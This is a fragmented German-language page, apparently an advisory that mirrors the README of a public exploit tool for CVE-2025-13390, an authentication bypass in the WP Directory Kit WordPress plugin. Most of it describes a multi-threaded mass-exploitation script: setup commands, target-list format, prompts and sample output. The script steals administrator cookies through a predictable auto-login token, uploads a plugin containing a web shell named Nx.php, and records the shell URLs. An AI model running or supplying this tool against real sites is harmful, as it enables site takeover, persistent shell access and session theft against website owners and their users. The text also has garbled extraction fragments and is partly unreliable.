
WP Directory Kit <= 1.4.4 - Authentifizierungs-Bypass zur Privilegieneskalation durch Kontoübernahme
WP Directory Kit <= 1.4.4 - Authentifizierungsumgehung zur Privilegienerweiterung durch Kontoübernahme
Das WP Directory Kit Plugin für WordPress ist in allen Versionen bis einschließlich 1.4.4 anfällig für eine Authentifizierungsumgehung, die auf eine fehlerhafte Implementierung des Authentifizierungsalgorithmus in der Funktion
wdk_generate_auto_login_linkzurückzuführen ist.Dies liegt daran, dass die Funktion einen kryptografisch schwachen Mechanismus zur Token-Erzeugung verwendet. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, administrativen Zugriff zu erlangen und eine vollständige Übernahme der Website über den Auto-Login-Endpunkt mit einem vorhersagbaren Token zu erreichen.
- CNA: Wordfence
- Basis-Score: 10.0 KRITISCH
- Vektor:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php).Nx.php).pip install -r requirements.txt
# Or individually:
pip install requests beautifulsoup4 colorama
Nxploited.zip), die Ihre Shell namens Nx.php im Stammverzeichnis enthält.list.txt) mit einer URL/einem Host pro Zeile vor.http(s)://) enthalten oder nur Domains/IPs sein.http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txtNxploited.zipsuccess_cookies.txt — Websites, auf denen erfolgreich Admin-Cookies extrahiert wurden.success_shells.txt — URLs erfolgreich hochgeladener Shells.uploads_log.txt — Vollständiges Protokoll der Plugin-Upload-Versuche. _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
8, 16, usw.)1 = Admin)/wp-content/plugins/ für Ihre Payload (Standard wird aus dem ZIP-Namen übernommen)